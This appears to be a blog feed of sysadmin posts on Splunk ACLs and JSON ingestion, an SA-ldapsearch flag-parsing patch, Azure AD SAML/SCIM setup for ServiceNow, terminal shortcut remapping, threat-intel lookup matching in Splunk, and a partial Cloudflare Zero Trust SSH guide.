[]access = read : [ roleA ], write : [ ][lookups/lookupB.csv]access = read : [ roleA, roleB ], write : [ ]
Or like this:
[]access = read : [ roleA ], write : [ ][lookups]access = read : [ roleA, roleB ], write : [ ]
None of the above configs will grant roleB read access to lookupB.csv. For the rest of this discussion, we assume that roleB should have access to lookupB.csv only.
# Interaction of ACLs across app-level, category level, and specific object configuration:- To access/use an object, users must have read access to: - the app containing the object - the generic category within the app (for example, [views]) - the object itself- If any layer does not permit read access, the object will not be accessible.
For brevity, this article will only discuss about read access which has slightly different interaction of ACLs compared to write access. Don’t worry, once you understood read access, it’s much easier to understand write access.
Notice a role must at least have read access to the app. The simplest way to grant roleB read access is,
[]access = read : [ roleA, roleB ], write : [ ]
While the above config is effective, but it does not meet the access requirement: roleB is granted read access to every objects in that app.
roleB can be restricted as such:
[]access = read : [ roleA, roleB ], write : [ ][lookups/lookupA.csv]access = read : [ roleA ], write : [ ][lookups/lookupB.csv]access = read : [ roleA, roleB ], write : [ ][lookups/lookupC.csv]access = read : [ roleA ], write : [ ]
It is effective and meets the requirement, but there is an issue. Every new lookup/object will now need to specify access = read : [ roleA ], write : [ ]
to restrict roleB’s access. This is similar to a default-allow firewall.
How to implement default-deny ACL? We can achieve it by separating into two apps: appA is accessible to roleA only, appB is accessible to roleA and roleB. Any object we want to share with roleA and roleB, we put it in appB instead.
[]access = read : [ roleA ], write : [ ]
[]access = read : [ roleA, roleB ], write : [ ]
In this approach, every new objects created in appA will not be accessible to roleB because it does not have app access.
I noticed lookup files that have object-level ACL, e.g.
[lookups/lookupC.csv]access = read : [ roleA ], write : [ ]
makes it non-removable, even with admin/sc-admin role.
My theory is that the object is non-removable to prevent the ACL from being orphaned. But this theory does not hold, at least for a lookup file that is shipped with an app; deleting a lookup file merely resets its content back to the app’s version. Deleting a lookup file is necessary during an app update that also have updated content of a bundled lookup file. Even when a lookup was never modified, Splunk will keep the content during an app update. Updating an app does not automatically update the bundled lookup, the lookup will only be updated after a delete operation.
Similar limitation (i.e. app update does not update the app’s object) also applies to dashboards. However, there is no way to delete a dashboard xml in Splunk Cloud, so updating a dashboard through app update always require app uninstallation beforehand.
]]>[ACCOUNTDISABLE, NORMAL_ACCOUNT]
instead. However, I noticed LOCKOUT
and PASSWORD_EXPIRED
flags are not shown even though I was sure the accounts I queried have either of those flags set. Those flags are indeed listed under documentations for “userAccountControl”: Windows Server and Active Directory Schema.Despite being mentioned in the documentations, in that Windows Server doc, there is a note that says those flags have been moved to “msDS-User-Account-Control-Computed“ attribute since Windows Server 2003. But when I queried that attribute, I got a decimal value which meant the parsing function was not applied.
To apply flag-parsing function on “msDS-User-Account-Control-Computed”:
'1.2.840.113556.1.4.8': format_user_flag_enum, # User-Account-Control'1.2.840.113556.1.4.1460': format_user_flag_enum, # ms-DS-User-Account-Control-Computed
First line is an existing one, the second line is the new one.
For the sake of completeness, that function can also be patched to parse other flags of “msDS-User-Account-Control-Computed”. I created a script to apply the following patch directly on “splunk-supporting-add-on-for-active-directory_*.tgz“ and save it to a new app package “SA-ldapsearch_*.tgz”.
--- SA-ldapsearch/bin/packages/app/formatting_extensions.py 2023-09-06 00:00:00.000000000 +0000+++ SA-ldapsearch/bin/packages/app/formatting_extensions.py 2023-09-06 00:00:00.000000001 +0000@@ -721,6 +721,12 @@ names.append('PASSWORD_EXPIRED') if flags & 0x1000000: names.append('TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION')+ if flags & 0x2000000:+ names.append('NO_AUTH_DATA_REQUIRED')+ if flags & 0x4000000:+ names.append('PARTIAL_SECRETS_ACCOUNT')+ if flags & 0x8000000:+ names.append('USE_AES_KEYS') # Zero or one of these flags may be set@@ -822,6 +828,7 @@ '1.2.840.113556.1.4.1303': format_sid, # Token-Groups-No-GC-Acceptable '1.2.840.113556.1.4.8': format_user_flag_enum, # User-Account-Control+ '1.2.840.113556.1.4.1460': format_user_flag_enum, # ms-DS-User-Account-Control-Computed # formatter specially for msExchMailboxSecurityDescriptor '1.2.840.113556.1.4.7000.102.80' : format_security_descriptor, # msExchMailboxSecurityDescriptor
]]>In an enterprise environment, SSO provides convenience to the staff and several benefits to the enterprise. Three benefits to the enterprise:
SSO does not necessarily provide better security all the time. Threat actor can utilise a compromised account to access any SSO-enabled system that the account has access prior, leading to wider blast radius. There are three mitigations to reduce such risk:
Configuring a system to utilise Azure Active Directory (AAD) involves setting up SAML and optionally SCIM. SCIM is only used to provision users, SAML can supply the necessary information (email, name, phone, etc) to the SSO-enabled system to create users on-demand upon first login (of that user) and update the user information in subsequent logins. In ServiceNow SAML configuration, under “User Provisioning” tab, on-demand user provision can be enabled by ticking “Auto Provisioning User” and “Update User Record Upon Each Login”.
During the initial SAML setup in ServiceNow, it requires a successful test login (using an AAD account, in this case) before SSO can be activated. This will fail if the user does not exist in ServiceNow yet. To pass it, simply create a new ServiceNow user that has the same email as the test AAD account. If you are confident the SAML setting is correct, the test login can be made optional. It is easier to utilise the “Automatically configure ServiceNow” option because it will also configure the transform mapping in ServiceNow which enables it to map SAML attributes (emailaddress, name, etc) to the respective ServiceNow’s sys_user table columns.
In SAML configuration, AAD uses the “user.userprincipalname” (UPN) attribute as the unique user identifier. UPN is usually equivalent to the email address, so the AAD guide recommends to change the user identifier to “email” in ServiceNow’s Multi-Provider SSO. However, it is possible for UPN to be different to email and will prevent affected users from accessing ServiceNow. UPN or email is also not immutable, a user may change their email to reflect a name change. This can results in duplicate users, if “Auto Provisioning User” is enabled in ServiceNow.
Even though SCIM can avoid duplicates, users with a recently changed email may still face access issue for a while because AAD SCIM is not real-time and each sync can take up to 30 minutes, longer if the attribute is sourced from on-premise AD (which will needs to be synced-up to AAD using AD Connect, and then to ServiceNow using SCIM).
To avoid this issue, there are three choices of source attribute that are immutable, each of them is suitable as a unique user identifier in SAML. They do not map with existing ServiceNow sys_user columns, so you will need a new column and a new mapping in the transform map.
user.objectid
: for AAD-only environment.user.onpremisesimmutableid
: refers to GUID. AAD uses this attribute as the primary key to identify on-premise AD user.user.onpremisesecurityidentifier
: refers to SID, may not necessarily synced-up to AAD.With on-demand user provision, it is possible to use SAML without SCIM. However, since a user is only created after the initial SSO login, user lookup will be limited. For example in ServiceNow, a support staff will not be able to enter the “this incident affects user X” field if that user has never login to ServiceNow before. SCIM can provision all users found in an identity provider into a target system. It is also possible to provision based on conditions, such as to exclude generic or service accounts.
Prior to configuring SCIM in ServiceNow, it is essential to disable SAML on-demand user provision “Auto Provisioning User” and “Update User Record Upon Each Login”. This is to avoid SAML-sourced attribute from overwriting SCIM’s in sys_user table, because SAML mapping does not necessarily match SCIM’s.
In AAD SCIM, the default primary mapping is userPrincipalName → user_name with user_name being set as the primary key (Show advanced options → Edit attribute list for ServiceNow). A mapping is considered as primary when it has “Match objects using this attribute“ enabled and has the lowest value in “Matching precedence”. “Match objects…” is to configure SCIM to utilise a mapping to check existence of each user, i.e. provision a user in the target system if it does not exist. Multiple mappings can be used in different order, in case a source attribute is empty. At least one mapping must have “Match objects…” enabled.
user | employeeId (AAD) | mail (AAD) | employee_number (SNow) | email (SNow) |
---|---|---|---|---|
A | 123 | empty | 123 | empty |
B | empty | b@example.com | empty | b@example.com |
What if user B has employeeId later on? There is a (unconfirmed) possibility that it can results in duplicate user B in the target system.
user | employeeId (AAD) | mail (AAD) | employee_number (SNow) | email (SNow) |
---|---|---|---|---|
A | 123 | empty | 123 | empty |
B | 456 | b@example.com | empty | b@example.com |
B (duplicate in SNow) | 456 | b@example.com | 456 | b@example.com |
This can be avoided by using a mandatory and immutable AAD attribute. Similar to the three options mentioned in the previous section, they are:
objectId
immutableId
onPremisesSecurityIdentifier
Steps to configure:
An interesting issue I encountered which was ultimately caused by an AAD attribute that had a value of just a single space. I initially configured a SCIM mapping as follow: Coalesce([attributeA], [attributeB]) → u*column_z. Coalesce() returns the first non-empty value. I knew attributeB is never empty, however somehow some users had *(blank)_ value in their u_column_z.
I fired up the Expression Builder in AAD SCIM and tried “Coalesce([attributeA], [attributeB])” on one of the affected users. It returned “Your expression is valid, but your expression evaluated to an empty string”. Tried “ToUpper([attributeA])”, same. Tried “IsNullorEmpty([attributeA])”, got “false”. If an attribute has empty value, it will return “null”. So, this meant attributeA is not empty. But what could it be?
IIF([attributeA]=" ", "space", "no space")space
AAD SCIM trims any leading and trailing whitespaces in the output, similar to trim()
JavaScript method.
Aside from an obvious fix by removing that space in AAD, a workaround like “Coalesce(Trim([attributeA]), [attributeB])” works too.
]]>Ctrl+a
(line start) and Ctrl+e
(line end). Interested to learn more tricks, I went on search for a cheatsheet and found this. I then added two missing shortcuts (Ctrl+h
& Ctrl+d
), printed it out and stick it to my desk.However there were two shortcuts which did not work as intended: Ctrl+h
and Ctrl+Backspace
. The first one is supposed to be equivalent to backspace, but it was deleting previous word just like Ctrl+Backspace
or Ctrl+w
. The second one did not work on PowerShell’s Emacs mode.
While looking for a workaround for other terminal and shell, I find it helpful to remember these two facts so that you can stay on the right track.
In Kitty, $TERM
is “xterm-kitty”; most other Linux terminals output it as “xterm-256color”. The value actually refers to the “terminfo“ being used and not the terminal emulator.
When Ctrl+Backspace is pressed, a terminal emulator either sends “^?” or “^H” control character to the shell, which then initiate an action (e.g. “backward-kill-word”).
“^[character]“ is first and foremost a caret notation of a control character, a friendlier representation of hexadecimal, much like hexadecimal is a nicer representation of binary. “^H” actually means control-code-8 (H is the eighth letter), instead of representing Ctrl+h
. “^H” can be entered using Ctrl+h
simply because it is more practical than having a dedicated key for each control character on a keyboard.
Most terminal emulators map Backspace
to “^?” and Ctrl+Backspace
to “^H”. Since Ctrl+h
is also mapped to “^H”, thus sharing a similar action (“backward-kill-word”) with Ctrl+Backspace
. The easiest fix is to remap Ctrl+h
to “^?”. This approach only needs to configure the terminal emulator.
To check which control character is mapped to:
$ showkey -a# backspace^? 127 0177 0x7f# ctrl+ backspace^H 8 0010 0x08
map ctrl+h send_text normal \x7f
Add the above line to the end of “$HOME/.config/kitty/kitty.conf”. “7f” is the hex of “^?”.
Press Ctrl+Shirt+F5
to reload the config and run showkey -a
to verify Ctrl+h
has been remapped.
$ showkey -a# ctrl+h^? 127 0177 0x7f
Go Settings → Open JSON file which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under "actions"
list, append the following object.
{ "command": { "action": "sendInput", "input": "\u007F" }, "keys": "ctrl+h"}
Ctrl+Backspace
does not work as expected when I switch the PowerShell’s edit mode to Emacs Set-PSReadLineOption -EditMode Emacs
, even though it works in the default Cmd
mode. This is because PowerShell binds it to BackwardDeleteChar
in Emacs mode. Somehow I could not remap it to “^H” (\b
).
Some xterm users also have this issue and a workaround is by mapping it to an unused escape sequence, then bind it to backward-kill-word in the shell. While Windows Terminal supports sending an escape sequence, the corresponding binding is not supported in PowerShell. Instead of using escape sequence, let’s use a unicode character, specifically a character within the range of private use area (U+E888-U+F8FF
) to avoid conflict with existing characters. I choose U+E888
for this example.
Anyhow, it is only a tiny issue for me since I can always use Ctrl+w
.
Go Settings → Open JSON file which will open “$home\AppData\Local\Packages\Microsoft.WindowsTerminal_xxx\LocalState\settings.json”. Under "actions"
list, append the following object.
{ "command": { "action": "sendInput", "input": "\uE888" }, "keys": "ctrl+backspace"}
Set-PSReadLineKeyHandler -Chord "`u{E888}" -Function BackwardKillWord
The following Windows Terminal + PowerShell configs did not work for me. Windows Terminal did yield the correct control character, but somehow PowerShell could not recognise it.
{ "command": { "action": "sendInput", "input": "\u007F" }, "keys": "backspace"},{ "command": { "action": "sendInput", "input": "\b" }, "keys": "ctrl+backspace"}
Set-PSReadLineKeyHandler -Chord "`u{007F}" -Function BackwardDeleteCharSet-PSReadLineKeyHandler -Chord "`b" -Function BackwardKillWord
bindkey '\uE888' backward-kill-word
bind '"\uE888":backward-kill-word'
]]>{ "datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3" }{ "datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3" }
The format can be achieved by exporting live event in JSON and append to a log file. However, I encountered a situation where the log file can only be generated by batch. Exporting the equivalent of the previous “example.log” in JSON without string manipulation looks like this:
[{"datetime": 1672531212123456, "event_id": 1, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531213789012, "event_id": 2, "key1": "value1", "key2": "value2", "key3": "value3"}, {"datetime": 1672531214345678, "event_id": 3, "key1": "value1", "key2": "value2", "key3": "value3"}]
I will detail the required configurations in this post, so that Splunk is able to parse it correctly even though “example.json” is not a valid JSON file.
[monitor:///var/log/app_a]disabled = 0index = index_namesourcetype = app_a_event
monitor directive is made up of two parts: monitor://
and the path, e.g. /var/log/app_a
. Unlike most Splunk configs, this directive does’t require the backslash (used in Windows path) to be escaped, e.g. monitor://C:\foo\bar
.
A path can be a file or a folder. When (*) wildcard matching is used to match multiple folders, another wildcard needs to be specified again to match files in those matched folders. The wildcard works for a single path segment only. For example, to match all the following files, use monitor:///var/log/app_*/*
. Splunk also supports “…” for recursive matching.
/var/log/├── app_a│ ├── 1.log│ ├── 2.log│ └── 3.log├── app_b│ ├── 1.log│ ├── 2.log│ └── 3.log└── app_c ├── 1.log ├── 2.log └── 3.log
Specify an appropriate value in sourcetype config, the value will be the value of sourcetype
field in the ingested events under the “monitor” directive. Take note of the value you have configured, it will be used in the rest of configurations.
[app_a_event]description = App A logsINDEXED_EXTRACTIONS = JSON# separate each object into a lineLINE_BREAKER = }(,){\"datetime\"# a line represents an eventSHOULD_LINEMERGE = 0TIMESTAMP_FIELDS = datetimeTIME_FORMAT = %s## default is 2000# MAX_DAYS_AGO = 3560
The directive name should be the sourcetype value specified in the inputs.conf. The following configs apply to the universal forwarder is because INDEXED_EXTRACTIONS
is used.
}(,){\"datetime\"
searches for },{"datetime"
and replaces “,” with “\n”.datetime
key in the example.json
.%s%3N
when there is subsecond.The location of “props.conf” depends on whether the universal forwarder is centrally managed by a deployment server.
Path A: $SPLUNK_HOME/etc/deployment-apps/foo/local/props.conf
Path B: $SPLUNK_HOME/etc/apps/foo/local/props.conf
If there is a deployment server, then the config file should be in path A, in which the server will automatically deploy it to path B in the UF. If the UF is not centrally managed, it should head straight to path B.
[app_a_event]description = App A logsKV_MODE = noneAUTO_KV_JSON = 0SHOULD_LINEMERGE = 0
Since index-time field extraction is already enabled using INDEXED_EXTRACTIONS
, search-time field extraction is no longer necessary. If KV_MODE
and AUTO_KV_JSON
are not disabled, there will be duplicate fields in the search result.
In Splunk Enterprise, the above file can be saved in a custom app, e.g. “$SPLUNK_HOME/etc/app/custom-app/default/props.conf”
For Splunk Cloud deployment, the above configuration can be added through a custom app or Splunk Web: Settings > Source types.
It is important to note SEDCMD
runs after INDEXED_EXTRACTIONS
. I noticed this behaviour when I tried to ingest API response of LibreNMS.
{"status": "ok", "devices": [{"device_id": 1, "key1": "value1", "key2": "value2"}, {"device_id": 2, "key1": "value1", "key2": "value2"}, {"device_id": 3, "key1": "value1", "key2": "value2"}], "count": 3}
In this scenario, I only wanted to ingest “devices” array where each item is an event. The previous approach not only did not split the array, but “status” and “count” fields still existed in each event despite the use of SEDCMD to remove them.
The solution is not to use INDEXED_EXTRACTIONS (index-time field extraction), but use KV_MODE (search-time field extraction) instead. INDEXED_EXTRACTIONS is not enabled so that SEDCMD works more reliably. If it’s enabled, the JSON parser can unpredictably split part of the prefix (in this case {"status": "ok", "devices": [
) or suffix into separate events and SEDCMD does not work across events. SEDCMD does work with INDEXED_EXTRACTIONS, but you have to make sure the replacement is within an event
# heavy forwarder or indexer[api_a_response]description = API A response# remove bracket at the start and end of each lineSEDCMD-remove_prefix = s/^\{"status": "ok", "devices": \[//gSEDCMD-remove_suffix = s/\], "count": [0-9]+\}$//g# separate each object into a lineLINE_BREAKER = }(, ){\"device_id\"# if each line/event is very long# TRUNCATE = 0# a line represents an eventSHOULD_LINEMERGE = 0
# search head[api_a_response]description = API A responseKV_MODE = jsonAUTO_KV_JSON = 1
]]>These CSV files can be used as lookups to find potentially malicious traffic. They contain a list of bad IPs/domains/URLs and we are going to look for those values in the events.
We can view the content of a lookup file by using inputlookup
. When using that command, there should always be a leading pipe character “|” because it is an event-generating command.
Lookup file can be uploaded via Splunk Web or creating the file in the following locations:
$SPLUNK_HOME/etc/users/<username>/<app_name>/lookups/
$SPLUNK_HOME/etc/apps/<app_name>/lookups/
$SPLUNK_HOME/etc/system/lookups/
In Splunk Web, setting the permission to app-sharing or global-sharing will automatically moves the file to the second or third location respectively. Uploaded lookup file can be used straight away without having to reload app or restart Splunk, regardless of which way it was created.
| inputlookup botnet_ip.csv
_time
field is omitted for brevity.
first_seen_utc | dst_ip | dst_port | c2_status | last_online | malware | updated |
---|---|---|---|---|---|---|
2021-05-16 19:49:33 | 1.2.3.4 | 1234 | online | 2023-03-05 | Lorem | 2023-03-04T16:41:17Z |
The output is no different to any other event, we can specify which fields to be displayed and then rename the fields.
| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst
dst |
---|
178.128.23.9 |
Example firewall events:
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
Notice the second row’s dst
value matches dst_port
value of the example lookup table shown in the previous section.
To match for dst
value of the firewall events and dst_ip
of the lookup file, use a subsearch with inputlookup
. In this example, the subsearch extracts only the dst_ip
field and rename it to dst
in order to match the same field in the firewall events.
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
To display events in table format, append | table *
Asterisk character (*
) in the lookup file does work as a wildcard.
index=proxy
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
192.168.1.4 | bar.com/path3 | 443 |
The lookup files do not include wildcard affix.
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
foo.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
The add-on includes geturlhausfilter
command along with other commands to update their respective lookup file. Those commands has wildcard_suffix
argument to append wildcard to the field’s values.
| geturlhausfilter wildcard_suffix=host| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv
host | path | message | updated | host_wildcard_suffix |
---|---|---|---|---|
foo.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | foo.com* |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_suffix | rename host_wildcard_suffix AS url ]
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
Previous section showed an example using wildcard suffix (“foo.com*“). Wildcard also works as a prefix (“*foo.com”) or even in the middle (“f*o.com”), though these are discouraged.
index=proxy
src | domain | dst_port |
---|---|---|
192.168.1.5 | foo.com | 443 |
192.168.1.3 | lorem.foo.com | 443 |
192.168.1.4 | bar.com | 443 |
| geturlhausfilter wildcard_prefix=host| outputlookup override_if_empty=false urlhaus-filter-splunk-online.csv
host | path | message | updated | host_wildcard_prefix |
---|---|---|---|---|
foo.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | *foo.com |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host_wildcard_prefix | rename host_wildcard_prefix AS domain ]
src | domain | dst_port |
---|---|---|
192.168.1.5 | foo.com | 443 |
192.168.1.3 | lorem.foo.com | 443 |
File hosting services like Google Docs and Dropbox are commonly abused to host phishing website. For those sites, the lookup should match both domain and path. When specifying more than one field in fields
command, all fields will be matched using AND condition.
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | foo.com | document1.html |
192.168.1.3 | foo.com | document2.html |
192.168.1.4 | foo.com | document3.html |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
foo.com | document1.html | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain | path |
---|---|---|
192.168.1.5 | foo.com | document1.html |
A lookup file may have rows with empty path
to denote a domain
should be blocked regardless of paths, while also having rows with both domain
and path
to denote a specific URL should be blocked instead. The syntax is the same as what was shown in the previous section because Splunk will only match non-empty values, empty values will be ignored instead.
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | foo-bar.html |
192.168.1.4 | docs.google.com | malware.exe |
192.168.1.4 | docs.google.com | safe.doc |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
bad-domain.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | |
docs.google.com | malware.exe | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | foo-bar.html |
192.168.1.4 | docs.google.com | malware.exe |
Lookup file is case-insensitive. If case-sensitive matching is required, use lookup
and lookup definition.
index=proxy
src | domain |
---|---|
192.168.1.5 | loremipsum.com |
| inputlookup urlhaus-filter-splunk-online.csv
host | path | message | updated |
---|---|---|---|
lOrEmIpSuM.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | |
docs.google.com | malware.exe | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy [| inputlookup urlhaus-filter-splunk-online.csv | fields host, path | rename host AS domain ]
src | domain |
---|---|
192.168.1.5 | loremipsum.com |
Splunk automatically detects CIDR-like value in a lookup file and performs CIDR-matching accordingly. However, this behaviour is on best-effort basis and may not work as intended. To explicitly use lookup fields for CIDR-matching, use lookup
and lookup definition.
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
| inputlookup opendbl_ip.csv
start | end | netmask | cidr_range | name | updated |
---|---|---|---|---|---|
187.190.252.167 | 187.190.252.167 | 32 | 187.190.252.167/32 | Emerging Threats: Known Compromised Hosts | 2023-01-30T08:03:00Z |
89.248.163.0 | 89.248.163.255 | 24 | 89.248.163.0/24 | Dshield | 2023-01-30T08:01:00Z |
index=firewall [| inputlookup opendbl_ip.csv | fields cidr_range | rename cidr_range AS dst ]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
When using as a subsearch, inputlookup
filters the event data and only outputs rows with matching values of specified field(s). lookup
enriches the event data by appending new fields to the rows with matching field values. Another way to understand the difference is that inputlookup
performs inner join while lookup
performs left outer join where the event data is the left table and the lookup file is the right table.
Despite their difference, it can be useful to use both at the same time to enrich filtered event data, even when using the same lookup file.
| inputlookup botnet_ip.csv
_time
field is omitted for brevity.
first_seen_utc | dst_ip | dst_port | c2_status | last_online | malware | updated |
---|---|---|---|---|---|---|
2021-05-16 19:49:33 | 1.2.3.4 | 1234 | online | 2023-03-05 | Lorem | 2023-03-04T16:41:17Z |
2021-05-16 19:49:33 | 4.3.2.1 | 1234 | online | 2023-03-05 | Ipsum | 2023-03-04T16:41:17Z |
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 7.7.5.5 | allowed |
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status, malware
src | src_port | dst | action | c2_status | malware |
---|---|---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed | online | Lorem |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | online | Ipsum |
It is also possible to rename lookup destination fields.
index=firewall [| inputlookup botnet_ip.csv | fields dst_ip | rename dst_ip AS dst]| lookup botnet_ip.csv dst_ip AS dst OUTPUT c2_status AS "C2 Server Status", malware AS "Malware Family"
src | src_port | dst | action | C2 Server Status | Malware Family |
---|---|---|---|---|---|
192.168.1.5 | 45454 | 1.2.3.4 | allowed | online | Lorem |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | online | Ipsum |
Lookup definition provides matching rules for a lookup file. It can be configured for case-sensitivity, wildcard, CIDR-matching and others through transforms.conf. It can also be configured via Splunk Web: Settings → Lookups → Lookup definitions.
A bare minimum lookup definition is as such:
[lookup-definition-name]filename = lookup-filename.csv
transforms.conf can be saved in the following directories in order of priority (highest to lowest):
$SPLUNK_HOME/etc/users/<username>/<app_name>/local/
$SPLUNK_HOME/etc/apps/<app_name>/local/
$SPLUNK_HOME/etc/system/local/
My naming convention for lookup definition is simply removing the .csv
extension, e.g. “example.csv” (lookup file), “example” (lookup definition). While it is possible to name a lookup definition with file extension (“example.csv”), I discourage it to avoid confusion.
It is imperative to note that lookup definition only applies to lookup
search command and does not apply to inputlookup
. Although inputlookup
supports lookup definition as a lookup table (in addition to lookup file), its matching rules will be ignored.
[urlhaus-filter-splunk-online]filename = urlhaus-filter-splunk-online.csv# applies to all fieldscase_sensitive_match = 1
index=proxy
src | domain | path |
---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html |
192.168.1.3 | bad-domain.com | lOrEm-iPsUm.hTmL |
| inputlookup urlhaus-filter-splunk-online
host | path | message | updated |
---|---|---|---|
bad-domain.com | lorem-ipsum.html | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z |
index=proxy| lookup urlhaus-filter-splunk-online host AS domain, path OUTPUT message
src | domain | path | message |
---|---|---|---|
192.168.1.5 | bad-domain.com | lorem-ipsum.html | urlhaus-filter malicious website detected |
192.168.1.3 | bad-domain.com | lOrEm-iPsUm.hTmL |
[urlhaus-filter-splunk-online]filename = urlhaus-filter-splunk-online.csvmatch_type = WILDCARD(host_wildcard_suffix)
index=proxy
src | url | dst_port |
---|---|---|
192.168.1.5 | foo.com/path1 | 443 |
192.168.1.3 | foo.com/path2 | 443 |
192.168.1.4 | bar.com/path3 | 443 |
The lookup files do not include wildcard affix.
| inputlookup urlhaus-filter-splunk-online
host | path | message | updated | host_wildcard_suffix |
---|---|---|---|---|
foo.com | urlhaus-filter malicious website detected | 2023-03-13T00:11:20Z | foo.com* |
index=proxy| lookup urlhaus-filter-splunk-online host_wildcard_suffix AS url OUTPUT message
src | url | dst_port | message |
---|---|---|---|
192.168.1.5 | foo.com/path1 | 443 | urlhaus-filter malicious website detected |
192.168.1.3 | foo.com/path2 | 443 | urlhaus-filter malicious website detected |
[opendbl_ip]filename = opendbl_ip.csvmatch_type = CIDR(cidr_range)
index=firewall
src | src_port | dst | action |
---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed |
192.168.1.3 | 45452 | 7.6.5.4 | allowed |
192.168.1.4 | 45457 | 4.3.2.1 | allowed |
192.168.1.6 | 45451 | 89.248.163.100 | allowed |
| inputlookup opendbl_ip
start | end | netmask | cidr_range | name | updated |
---|---|---|---|---|---|
187.190.252.167 | 187.190.252.167 | 32 | 187.190.252.167/32 | Emerging Threats: Known Compromised Hosts | 2023-01-30T08:03:00Z |
89.248.163.0 | 89.248.163.255 | 24 | 89.248.163.0/24 | Dshield | 2023-01-30T08:01:00Z |
index=firewall| lookup opendbl_ip cidr_range AS dst OUTPUT name AS threat
src | src_port | dst | action | threat |
---|---|---|---|---|
192.168.1.5 | 45454 | 187.190.252.167 | allowed | Emerging Threats: Known Compromised Hosts |
192.168.1.3 | 45452 | 7.6.5.4 | allowed | |
192.168.1.4 | 45457 | 4.3.2.1 | allowed | |
192.168.1.6 | 45451 | 89.248.163.100 | allowed | Dshield |
One unpleasant task I had previously in an enterprise with Linux servers was SSH key management, specifically checking the SSH public keys of departed staff have been removed from the Ansible config. Then I learned from this article that it is possible to SSH using a short-lived (<1 day) certificate that is only issued to the user after successfully authenticate with the enterprise identity provider’s (e.g. Azure AD) single sign-on (SSO). This means once a user is revoked from the identity provider, that user would not be issued with a new certificate to SSH again the next day. At that time, I didn’t feel like configuring and integrating an identity provider, so I held off trying the feature.
Recently, I wanted to try out the Cloudflare Zero Trust free tier. While reading through the SSH configuration guide, I found out that Cloudflare support issuing SSH user certificate. While Cloudflare supports several SSO integration, it also supports authenticating using one-time PIN sent to an email address that does not have to be a Cloudflare account. Cloudflare also supports browser-based shell, just like the AWS Session Manager.
Navigate to Zero Trust page shown on the sidebar after you login to dash.cloudflare.com. If this is your first time, Cloudflare will ask for billing info in which you can use an existing one or add a new credit card. You won’t get charged as long as you stay within the free tier (50 users), I will show you how to check later in this article.
The setup will then ask you to name your team domain team-name.cloudflareaccess.com. Just create a random name for now, you can always change it later.
Once you’re in Zero Trust console, navigate to Access → Applications. Add an application and choose Self-hosted.
Configure app tab,
Add policies tab,
Setup tab:
